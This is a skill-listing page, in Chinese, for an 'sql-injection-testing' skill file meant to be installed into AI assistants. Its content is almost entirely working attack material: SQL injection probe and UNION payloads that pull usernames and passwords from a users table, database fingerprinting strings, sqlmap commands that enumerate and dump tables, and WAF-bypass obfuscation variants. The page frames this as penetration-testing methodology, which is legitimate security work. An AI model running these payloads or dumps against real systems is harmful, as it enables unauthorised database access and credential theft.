用 Codex 或 Claude 帮你安装 复制这段 Prompt,粘贴到 Codex、Claude 或其他助手里,让它检查 Skill 页面并帮你完成安装。
直接命令不会经过审查 Prompt;运行前请先检查来源。
npx skills add https://github.com/tomevault-io/skills-registry --skill sql-injection-testing命令会保持在同一行。复制前请横向滚动并检查完整内容。
想先保存到本地?可下载 SkillsMP 当前能够提供的文件。
正在显示 SKILL.md
基于 SOC 职业分类
| name | sql-injection-testing |
| description | SQL注入测试的专业技能和方法论 Use when this capability is needed. |
| metadata | {"author":"ed1s0nz"} |
SQL注入是一种常见且危险的Web应用漏洞。本技能提供了系统化的SQL注入测试方法、检测技术和利用策略。
' - 查看是否出现SQL错误' AND '1'='1 vs ' AND '1'='2' AND SLEEP(5)--' UNION SELECT NULL--' AND @@version LIKE '%mysql%'--' AND version() LIKE '%PostgreSQL%'--' AND @@version LIKE '%Microsoft%'--' AND (SELECT banner FROM v$version WHERE rownum=1) LIKE '%Oracle%'--' UNION SELECT database()--' UNION SELECT table_name FROM information_schema.tables--' UNION SELECT column_name FROM information_schema.columns WHERE table_name='users'--' UNION SELECT username,password FROM users--# 基础扫描
sqlmap -u "http://target.com/page?id=1"
# 指定参数
sqlmap -u "http://target.com/page" --data="id=1" --method=POST
# 指定数据库类型
sqlmap -u "http://target.com/page?id=1" --dbms=mysql
# 获取数据库列表
sqlmap -u "http://target.com/page?id=1" --dbs
# 获取表
sqlmap -u "http://target.com/page?id=1" -D database_name --tables
# 获取数据
sqlmap -u "http://target.com/page?id=1" -D database_name -T users --dump
/**/, --, #SeLeCt, UnIoN/**/, +, %09(Tab), %0A(换行)原始:' UNION SELECT NULL--
绕过1:'/**/UNION/**/SELECT/**/NULL--
绕过2:'%55nion%20select%20null--
绕过3:'/*!UNION*//*!SELECT*/null--
Converted and distributed by TomeVault — claim your Tome and manage your conversions.